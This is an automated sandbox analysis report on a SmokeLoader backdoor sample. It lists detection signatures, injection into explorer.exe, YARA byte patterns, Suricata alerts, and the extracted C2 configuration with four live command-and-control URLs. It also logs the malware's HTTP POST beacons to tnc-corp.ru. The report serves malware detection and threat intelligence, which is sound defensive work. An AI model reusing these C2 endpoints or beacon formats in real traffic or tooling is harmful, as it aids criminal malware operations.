Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
2Qvkmk7HGr.exe

Overview

General Information

Sample name:2Qvkmk7HGr.exe
renamed because original name is a hash value
Original sample name:4bb69f9fad0620ecb64971676b9f2cbc.exe
Analysis ID:1538071
MD5:4bb69f9fad0620ecb64971676b9f2cbc
SHA1:519d65503d586d0442ea411d03e790d52b564eee
SHA256:6ce6a03625c3a1e2b97d490363a3ec5be1706ec424493d7de2c9cad2644c3311
Tags:exeStealcuser-abuse_ch
Infos:

Detection

SmokeLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Benign windows process drops PE files
Detected unpacking (changes PE section rights)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
System process connects to network (likely due to code injection or exploit)
Yara detected SmokeLoader
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))
Checks if the current machine is a virtual machine (disk enumeration)
Creates a thread in another existing process (thread injection)
Deletes itself after installation
Hides that the sample has been downloaded from the Internet (zone.identifier)
Machine Learning detection for dropped file
Machine Learning detection for sample
Maps a DLL or memory area into another process
Switches to a custom stack to bypass stack traces
Abnormal high CPU Usage
Checks if the current process is being debugged
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Detected potential crypto function
Drops PE files
Drops files with a non-matching file extension (content does not match file extension)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Sigma detected: Execution of Suspicious File Type Extension
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • 2Qvkmk7HGr.exe (PID: 7032 cmdline: "C:\Users\user\Desktop\2Qvkmk7HGr.exe" MD5: 4BB69F9FAD0620ECB64971676B9F2CBC)
    • explorer.exe (PID: 2580 cmdline: C:\Windows\Explorer.EXE MD5: 662F4F92FDE3557E86D110526BB578D5)
  • tcgiwaf (PID: 5432 cmdline: C:\Users\user\AppData\Roaming\tcgiwaf MD5: 4BB69F9FAD0620ECB64971676B9F2CBC)
  • tcgiwaf (PID: 5848 cmdline: C:\Users\user\AppData\Roaming\tcgiwaf MD5: 4BB69F9FAD0620ECB64971676B9F2CBC)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
SmokeLoaderThe SmokeLoader family is a generic backdoor with a range of capabilities which depend on the modules included in any given build of the malware. The malware is delivered in a variety of ways and is broadly associated with criminal activity. The malware frequently tries to hide its C2 activity by generating requests to legitimate sites such as microsoft.com, bing.com, adobe.com, and others. Typically the actual Download returns an HTTP 404 but still contains data in the Response Body.
  • SMOKY SPIDER
https://malpedia.caad.fkie.fraunhofer.de/details/win.smokeloader

Malware Configuration

Threatname: SmokeLoader

{"Version": 2022, "C2 list": ["http://tnc-corp.ru/tmp/index.php", "http://volisc.biz/tmp/index.php", "http://livbev.online/tmp/index.php", "http://liverds.at/tmp/index.php"]}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000000.00000002.1769193164.0000000002101000.00000004.10000000.00040000.00000000.sdmpJoeSecurity_SmokeLoader_2Yara detected SmokeLoaderJoe Security
    00000000.00000002.1769193164.0000000002101000.00000004.10000000.00040000.00000000.sdmpWindows_Trojan_Smokeloader_4e31426eunknownunknown
    • 0x234:$a: 5B 81 EB 34 10 00 00 6A 30 58 64 8B 00 8B 40 0C 8B 40 1C 8B 40 08 89 85 C0
    00000000.00000002.1769009336.0000000000560000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_SmokeLoader_2Yara detected SmokeLoaderJoe Security
      00000000.00000002.1769009336.0000000000560000.00000004.00001000.00020000.00000000.sdmpWindows_Trojan_Smokeloader_4e31426eunknownunknown
      • 0x634:$a: 5B 81 EB 34 10 00 00 6A 30 58 64 8B 00 8B 40 0C 8B 40 1C 8B 40 08 89 85 C0
      00000000.00000002.1768987003.0000000000550000.00000040.00001000.00020000.00000000.sdmpWindows_Trojan_Smokeloader_3687686funknownunknown
      • 0x30d:$a: 0C 8B 45 F0 89 45 C8 8B 45 C8 8B 40 3C 8B 4D F0 8D 44 01 04 89
      Click to see the 7 entries

      Sigma Signatures

      System Summary

      barindex
      Sigma detected: Execution of Suspicious File Type Extension
      Source: Process startedAuthor: Max Altgelt (Nextron Systems): Data: Command: C:\Users\user\AppData\Roaming\tcgiwaf, CommandLine: C:\Users\user\AppData\Roaming\tcgiwaf, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Roaming\tcgiwaf, NewProcessName: C:\Users\user\AppData\Roaming\tcgiwaf, OriginalFileName: C:\Users\user\AppData\Roaming\tcgiwaf, ParentCommandLine: , ParentImage: , ParentProcessId: 1044, ProcessCommandLine: C:\Users\user\AppData\Roaming\tcgiwaf, ProcessId: 5432, ProcessName: tcgiwaf

      Suricata Signatures

      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
      2024-10-20T09:38:55.064900+020020391031A Network Trojan was detected192.168.2.455686211.171.233.12680TCP
      2024-10-20T09:39:16.001247+020020391031A Network Trojan was detected192.168.2.455718211.171.233.12680TCP
      2024-10-20T09:39:33.091816+020020391031A Network Trojan was detected192.168.2.455719211.171.233.12680TCP
      2024-10-20T09:39:57.293501+020020391031A Network Trojan was detected192.168.2.455720211.171.233.12680TCP
      2024-10-20T09:40:22.237445+020020391031A Network Trojan was detected192.168.2.454853211.171.233.12680TCP
      2024-10-20T09:40:43.105564+020020391031A Network Trojan was detected192.168.2.454854211.171.233.12680TCP

      Joe Sandbox Signatures

      Click to jump to signature section

      Show All Signature Results

      AV Detection

      barindex
      Antivirus / Scanner detection for submitted sample
      Source: 2Qvkmk7HGr.exeAvira: detected
      Antivirus detection for dropped file
      Source: C:\Users\user\AppData\Roaming\tcgiwafAvira: detection malicious, Label: HEUR/AGEN.1306978
      Found malware configuration
      Source: 00000000.00000002.1769009336.0000000000560000.00000004.00001000.00020000.00000000.sdmpMalware Configuration Extractor: SmokeLoader {"Version": 2022, "C2 list": ["http://tnc-corp.ru/tmp/index.php", "http://volisc.biz/tmp/index.php", "http://livbev.online/tmp/index.php", "http://liverds.at/tmp/index.php"]}
      Multi AV Scanner detection for domain / URL
      Source: liverds.atVirustotal: Detection: 5%Perma Link
      Source: livbev.onlineVirustotal: Detection: 6%Perma Link
      Source: volisc.bizVirustotal: Detection: 6%Perma Link
      Multi AV Scanner detection for dropped file
      Source: C:\Users\user\AppData\Roaming\tcgiwafReversingLabs: Detection: 39%
      Multi AV Scanner detection for submitted file
      Source: 2Qvkmk7HGr.exeReversingLabs: Detection: 39%
      Source: 2Qvkmk7HGr.exeVirustotal: Detection: 41%Perma Link
      AI detected suspicious sample
      Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
      Machine Learning detection for dropped file
      Source: C:\Users\user\AppData\Roaming\tcgiwafJoe Sandbox ML: detected
      Machine Learning detection for sample
      Source: 2Qvkmk7HGr.exeJoe Sandbox ML: detected
      Source: 2Qvkmk7HGr.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
      Source: C:\Users\user\Desktop\2Qvkmk7HGr.exeFile opened: C:\Windows\SysWOW64\msvcr100.dllJump to behavior
      Source: C:\Users\user\AppData\Roaming\tcgiwafCode function: 7_2_004032A0 GetNumberFormatW,InterlockedIncrement,SetFileAttributesW,GetCommMask,GetNumberFormatW,GetLogicalDriveStringsA,VerifyVersionInfoW,GetComputerNameA,ClearCommError,InterlockedIncrement,EnumTimeFormatsA,GetTempFileNameA,_memset,CommConfigDialogW,ReadConsoleInputA,GetVersionExW,CreateActCtxW,InterlockedExchange,InterlockedExchangeAdd,GetShortPathNameW,GetCurrencyFormatW,GetLocaleInfoW,InterlockedIncrement,SetVolumeMountPointA,GlobalUnWire,CreateSemaphoreW,7_2_004032A0

      Networking

      barindex
      Suricata IDS alerts for network traffic
      Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:54854 -> 211.171.233.126:80
      Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:55718 -> 211.171.233.126:80
      Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:55719 -> 211.171.233.126:80
      Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:55720 -> 211.171.233.126:80
      Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:54853 -> 211.171.233.126:80
      Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:55686 -> 211.171.233.126:80
      System process connects to network (likely due to code injection or exploit)
      Source: C:\Windows\explorer.exeNetwork Connect: 211.171.233.126 80Jump to behavior
      C2 URLs / IPs found in malware configuration
      Source: Malware configuration extractorURLs: http://tnc-corp.ru/tmp/index.php
      Source: Malware configuration extractorURLs: http://volisc.biz/tmp/index.php
      Source: Malware configuration extractorURLs: http://livbev.online/tmp/index.php
      Source: Malware configuration extractorURLs: http://liverds.at/tmp/index.php
      Source: Joe Sandbox ViewIP Address: 211.171.233.126 211.171.233.126
      Source: Joe Sandbox ViewASN Name: LGDACOMLGDACOMCorporationKR LGDACOMLGDACOMCorporationKR
      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://uepnecxbbbdpiq.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 191Host: tnc-corp.ru
      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://strnbrsjeqnhidm.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 176Host: tnc-corp.ru
      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://amjpnfqmtie.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 268Host: tnc-corp.ru
      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://lkexyglvlsxrxq.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 317Host: tnc-corp.ru
      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://kgbmakinbtdtwix.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 209Host: tnc-corp.ru
      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://roqbxksriohvi.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 134Host: tnc-corp.ru
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: global trafficDNS traffic detected: DNS query: tnc-corp.ru
      Source: global trafficDNS traffic detected: DNS query: volisc.biz
      Source: global trafficDNS traffic detected: DNS query: livbev.online
      Source: global trafficDNS traffic detected: DNS query: liverds.at
      Source: unknownHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://uepnecxbbbdpiq.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 191Host: tnc-corp.ru
      Source: explorer.exe, 00000001.00000000.1752481052.0000000009837000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1749862002.00000000079FB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
      Source: explorer.exe, 00000001.00000000.1752481052.0000000009837000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1749862002.00000000079FB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
      Source: explorer.exe, 00000001.00000000.1752481052.0000000009837000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1749862002.00000000079FB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
      Source: explorer.exe, 00000001.00000000.1752481052.0000000009837000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1749862002.00000000079FB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
      Source: explorer.exe, 00000001.00000000.1749862002.00000000078AD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.comhttp://crl3.digicert.com/DigiCertGlobalRootG2.crlhttp://crl4.digicert.com/Di
      Source: explorer.exe, 00000001.00000000.1753482488.0000000009B60000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000001.00000000.1751138246.0000000007F40000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000001.00000000.1751529258.0000000008720000.00000002.00000001.00040000.00000000.sdmpString found in binary or memory: http://schemas.micro
      Source: explorer.exe, 00000001.00000000.1758674619.000000000C964000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.autoitscript.com/autoit3/J
      Source: explorer.exe, 00000001.00000000.1758674619.000000000C893000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppcrobat.exe
      Source: explorer.exe, 00000001.00000000.1749862002.00000000079FB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/Vh5j3k
      Source: explorer.exe, 00000001.00000000.1749862002.00000000079FB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/odirmr
      Source: explorer.exe, 00000001.00000000.1758674619.000000000C5AA000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://android.notify.windows.com/iOS
      Source: explorer.exe, 00000001.00000000.1752481052.00000000097D4000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/
      Source: explorer.exe, 00000001.00000000.1752481052.00000000097D4000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/q
      Source: explorer.exe, 00000001.00000000.1748652192.0000000003700000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1748053995.0000000001240000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/v1/News/Feed/Windows?apikey=qrUeHGGYvVowZJuHA3XaH0uUvg1ZJ0GUZnXk3mxxPF&ocid=wind
      Source: explorer.exe, 00000001.00000000.1752481052.00000000096DF000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?&
      Source: explorer.exe, 00000001.00000000.1749862002.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?activityId=0CC40BF291614022B7DF6E2143E8A6AF&timeOut=5000&oc
      Source: explorer.exe, 00000001.00000000.1752481052.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1749862002.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com:443/v1/news/Feed/Windows?
      Source: explorer.exe, 00000001.00000000.1752481052.00000000096DF000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://arc.msn.comi
      Source: explorer.exe, 00000001.00000000.1749862002.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/staticsb/statics/latest/traffic/Notification/desktop/svg/RoadHazard.svg
      Source: explorer.exe, 00000001.00000000.1749862002.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earnings
      Source: explorer.exe, 00000001.00000000.1749862002.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/AAehR3S.svg
      Source: explorer.exe, 00000001.00000000.1749862002.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Teaser/humidity.svg
      Source: explorer.exe, 00000001.00000000.1749862002.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV
      Source: explorer.exe, 00000001.00000000.1749862002.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV-dark
      Source: explorer.exe, 00000001.00000000.1749862002.00000000078AD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gHZu
      Source: explorer.exe, 00000001.00000000.1749862002.00000000078AD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gHZu-dark
      Source: explorer.exe, 00000001.00000000.1749862002.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMeu
      Source: explorer.exe, 00000001.00000000.1749862002.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMeu-dark
      Source: explorer.exe, 00000001.00000000.1749862002.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gTUY
      Source: explorer.exe, 00000001.00000000.1749862002.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gTUY-dark
      Source: explorer.exe, 00000001.00000000.1758674619.000000000C5AA000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://excel.office.com
      Source: explorer.exe, 00000001.00000000.1749862002.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA15Yat4.img
      Source: explorer.exe, 00000001.00000000.1749862002.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA1hlXIY.img
      Source: explorer.exe, 00000001.00000000.1749862002.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAKSoFp.img
      Source: explorer.exe, 00000001.00000000.1749862002.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAXaopi.img
      Source: explorer.exe, 00000001.00000000.1749862002.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAgi0nZ.img
      Source: explorer.exe, 00000001.00000000.1749862002.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBqlLky.img
      Source: explorer.exe, 00000001.00000000.1749862002.00000000078AD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img.s-msn.com/tenant/amp/entityid/AAbC0oi.img
      Source: explorer.exe, 00000001.00000000.1758674619.000000000C5AA000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://outlook.com_
      Source: explorer.exe, 00000001.00000000.1758674619.000000000C5AA000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://powerpoint.office.comcember
      Source: explorer.exe, 00000001.00000000.1749862002.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://simpleflying.com/how-do-you-become-an-air-traffic-controller/
      Source: explorer.exe, 00000001.00000000.1749862002.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNew
      Source: explorer.exe, 00000001.00000000.1749862002.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://windows.msn.com:443/shellv2?osLocale=en-GB&chosenMarketReason=ImplicitNew
      Source: explorer.exe, 00000001.00000000.1758674619.000000000C557000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://wns.windows.com/L
      Source: explorer.exe, 00000001.00000000.1758674619.000000000C5AA000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://word.office.com
      Source: explorer.exe, 00000001.00000000.1749862002.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/lifestyle/lifestyle-buzz/biden-makes-decision-that-will-impact-more-than-1
      Source: explorer.exe, 00000001.00000000.1749862002.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/lifestyle/travel/i-ve-worked-at-a-campsite-for-5-years-these-are-the-15-mi
      Source: explorer.exe, 00000001.00000000.1749862002.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1749862002.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/money/personalfinance/13-states-that-don-t-tax-your-retirement-income/ar-A
      Source: explorer.exe, 00000001.00000000.1749862002.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/money/personalfinance/no-wonder-the-american-public-is-confused-if-you-re-
      Source: explorer.exe, 00000001.00000000.1749862002.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/politics/clarence-thomas-in-spotlight-as-supreme-court-delivers-blow-
      Source: explorer.exe, 00000001.00000000.1749862002.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/politics/exclusive-john-kelly-goes-on-the-record-to-confirm-several-d
      Source: explorer.exe, 00000001.00000000.1749862002.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/topic/breast%20cancer%20awareness%20month?ocid=winp1headerevent
      Source: explorer.exe, 00000001.00000000.1749862002.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/us/a-nationwide-emergency-alert-will-be-sent-to-all-u-s-cellphones-we
      Source: explorer.exe, 00000001.00000000.1749862002.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/us/metro-officials-still-investigating-friday-s-railcar-derailment/ar
      Source: explorer.exe, 00000001.00000000.1749862002.00000000078AD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/us/when-does-daylight-saving-time-end-2023-here-s-when-to-set-your-cl
      Source: explorer.exe, 00000001.00000000.1749862002.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/world/agostini-krausz-and-l-huillier-win-physics-nobel-for-looking-at
      Source: explorer.exe, 00000001.00000000.1749862002.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/weather/topstories/rest-of-hurricane-season-in-uncharted-waters-because-of
      Source: explorer.exe, 00000001.00000000.1749862002.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/weather/topstories/us-weather-super-el-nino-to-bring-more-flooding-and-win
      Source: explorer.exe, 00000001.00000000.1749862002.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com:443/en-us/feed
      Source: explorer.exe, 00000001.00000000.1749862002.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.rd.com/list/polite-habits-campers-dislike/
      Source: explorer.exe, 00000001.00000000.1749862002.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.rd.com/newsletter/?int_source=direct&int_medium=rd.com&int_campaign=nlrda_20221001_toppe

      Key, Mouse, Clipboard, Microphone and Screen Capturing

      barindex
      Yara detected SmokeLoader
      Source: Yara matchFile source: 00000000.00000002.1769193164.0000000002101000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000000.00000002.1769009336.0000000000560000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000005.00000002.2005144387.00000000020F1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000005.00000002.2004823776.0000000000570000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

      System Summary

      barindex
      Malicious sample detected (through community Yara rule)
      Source: 00000000.00000002.1769193164.0000000002101000.00000004.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
      Source: 00000000.00000002.1769009336.0000000000560000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
      Source: 00000000.00000002.1768987003.0000000000550000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
